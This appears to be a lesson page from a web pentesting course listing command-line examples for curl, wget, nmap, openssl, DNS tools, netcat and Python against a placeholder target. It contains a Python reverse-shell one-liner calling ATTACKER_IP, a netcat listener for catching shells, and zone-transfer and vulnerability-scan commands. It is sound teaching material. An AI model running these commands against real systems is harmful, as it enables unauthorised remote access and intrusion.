Certified Web Application Pentester
Foundation & Lab Build Up 0/3 Conquering BurpSuite 0/1 Acquiring Dev Tools for Pentesting 0/1 Proxy Configuration & Interception 0/1 Introduction to OWASP Top 10 0/1 Web Security Testing Guide Framework 0/1 Essentials CLI Tools 0/1 Pentest Methodology and Workflow 0/1 Reconnaissance and Information Gathering 0/8 Enumeration & Mapping Bugs 0/10 Attacking Authentication Flow 0/1
← Certified Web Application Pentester

Essentials CLI Tools

Task 1
Command Line Tools

1. curl Deep Dive

1.1 Basic Requests

# Simple GET
curl https://target.com

# Show response headers
curl -I https://target.com

# Verbose output (full request/response)
curl -v https://target.com

# Silent mode with specific output
curl -s -o /dev/null -w "%{http_code}\n" https://target.com

# Follow redirects
curl -L https://target.com

# Max redirects
curl -L --max-redirs 5 https://target.com

1.2 Request Methods and Data

# POST with form data
curl -X POST -d "username=admin&password=test" https://target.com/login

# POST with JSON
curl -X POST -H "Content-Type: application/json" \
     -d '{"username":"admin","password":"test"}' https://target.com/api/login

# PUT request
curl -X PUT -H "Content-Type: application/json" \
     -d '{"role":"admin"}' https://target.com/api/users/1

# DELETE request
curl -X DELETE https://target.com/api/users/1

# PATCH request
curl -X PATCH -H "Content-Type: application/json" \
     -d '{"email":"[email protected]"}' https://target.com/api/users/1

# File upload
curl -F "[email protected]" https://target.com/upload
curl -F "[email protected];type=image/jpeg" https://target.com/upload

1.3 Headers and Authentication

# Custom headers
curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9..." \
     -H "X-Forwarded-For: 127.0.0.1" \
     -H "User-Agent: Googlebot" https://target.com

# Basic auth
curl -u admin:password https://target.com/admin

# Cookie handling
curl -b "session=abc123; token=xyz" https://target.com
curl -c cookies.txt -b cookies.txt https://target.com/login

# Referer header
curl -e "https://target.com/dashboard" https://target.com/api/data

1.4 Proxy and SSL

# Through Burp proxy
curl -x http://127.0.0.1:8080 -k https://target.com

# SOCKS proxy
curl --socks5 127.0.0.1:9050 https://target.com

# Ignore SSL errors
curl -k https://self-signed.target.com

# Specify CA certificate
curl --cacert /path/to/ca.pem https://target.com

# Client certificate
curl --cert client.pem --key client-key.pem https://target.com

2. wget

# Download file
wget https://target.com/file.pdf

# Mirror entire website
wget -m -p -E -k https://target.com

# Download with custom headers
wget --header="Cookie: session=abc" https://target.com/admin

# Spider mode (don't download, just check links)
wget --spider -r https://target.com

3. httpie

# GET request
http GET https://target.com/api/users

# POST with JSON (default)
http POST https://target.com/api/login username=admin password=test

# Custom headers
http GET https://target.com/api/data "Authorization: Bearer TOKEN"

# Form data
http --form POST https://target.com/login username=admin password=test

# Follow redirects
http --follow https://target.com

4. nmap for Web Services

# Basic web port scan
nmap -sV -p 80,443,8080,8443,3000,5000,8000,8888 target.com

# Aggressive service detection
nmap -sV -sC -p- target.com

# Web-specific NSE scripts
nmap --script http-title -p 80,443,8080 target.com
nmap --script http-headers -p 80,443 target.com
nmap --script http-methods -p 80 target.com
nmap --script http-enum -p 80 target.com
nmap --script ssl-enum-ciphers -p 443 target.com
nmap --script http-git -p 80 target.com
nmap --script http-robots.txt -p 80 target.com

# Scan for common web vulns
nmap --script "http-vuln-*" -p 80,443 target.com

# Fast scan of top ports
nmap -F -sV target.com

5. openssl

# Test SSL/TLS connection
openssl s_client -connect target.com:443

# Check certificate details
openssl s_client -connect target.com:443 | openssl x509 -noout -text

# Test specific TLS version
openssl s_client -connect target.com:443 -tls1_2
openssl s_client -connect target.com:443 -tls1_3

# Check certificate dates
openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -dates

# Generate hash
echo -n "password" | openssl dgst -md5
echo -n "password" | openssl dgst -sha256

# Base64 encode/decode
echo -n "admin:password" | openssl base64
echo "YWRtaW46cGFzc3dvcmQ=" | openssl base64 -d

6. DNS Tools

# dig
dig target.com A
dig target.com MX
dig target.com TXT
dig target.com NS
dig target.com ANY
dig @8.8.8.8 target.com        # Specific DNS server
dig -x 93.184.216.34            # Reverse DNS
dig target.com AXFR @ns1.target.com  # Zone transfer

# nslookup
nslookup target.com
nslookup -type=MX target.com
nslookup -type=TXT target.com

# host
host target.com
host -t MX target.com
host -t AXFR target.com ns1.target.com

# whois
whois target.com
whois 93.184.216.34

7. netcat

# Connect to a port
nc -v target.com 80

# Send HTTP request manually
echo -e "GET / HTTP/1.1\r\nHost: target.com\r\n\r\n" | nc target.com 80

# Listen for reverse shell
nc -lvnp 4444

# Port scanning
nc -zv target.com 1-1000

# File transfer
nc -lvnp 4444 > received_file    # Receiver
nc target.com 4444 < file_to_send # Sender

# Banner grabbing
nc -v target.com 80
nc -v target.com 22

8. jq for JSON Processing

# Pretty print JSON
curl -s https://target.com/api/users | jq .

# Extract specific field
curl -s https://target.com/api/users | jq '.[].username'

# Filter results
curl -s https://target.com/api/users | jq '.[] | select(.role == "admin")'

# Count results
curl -s https://target.com/api/users | jq '. | length'

# Extract nested data
curl -s https://target.com/api/users | jq '.[0].profile.email'

# Create new JSON
echo '{}' | jq '. + {"username":"admin","role":"admin"}'

9. Python One-Liners

# Simple HTTP server
python3 -m http.server 8888

# URL encode
python3 -c "import urllib.parse; print(urllib.parse.quote('<script>alert(1)</script>'))"

# URL decode
python3 -c "import urllib.parse; print(urllib.parse.unquote('%3Cscript%3E'))"

# Base64 encode/decode
python3 -c "import base64; print(base64.b64encode(b'admin:password').decode())"
python3 -c "import base64; print(base64.b64decode('YWRtaW46cGFzc3dvcmQ=').decode())"

# Generate MD5/SHA hash
python3 -c "import hashlib; print(hashlib.md5(b'password').hexdigest())"
python3 -c "import hashlib; print(hashlib.sha256(b'password').hexdigest())"

# Quick HTTP request
python3 -c "import requests; r=requests.get('https://target.com'); print(r.status_code, len(r.text))"

# JWT decode (without verification)
python3 -c "import base64,json,sys; parts=sys.argv[1].split('.'); [print(json.loads(base64.b64decode(p+'=='))) for p in parts[:2]]" "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxIn0.sig"

# Reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

10. Bash Scripting for Automation

#!/bin/bash
# Quick subdomain checker
while read sub; do
    ip=$(dig +short "$sub.$1")
    if [ -n "$ip" ]; then
        echo "[+] $sub.$1 -> $ip"
    fi
done < subdomains.txt

# Status code checker
while read url; do
    code=$(curl -s -o /dev/null -w "%{http_code}" "$url")
    echo "$code $url"
done < urls.txt

# Header checker
for header in "X-Frame-Options" "Content-Security-Policy" "Strict-Transport-Security" "X-Content-Type-Options"; do
    result=$(curl -sI "$1" | grep -i "$header")
    if [ -z "$result" ]; then
        echo "[-] MISSING: $header"
    else
        echo "[+] $result"
    fi
done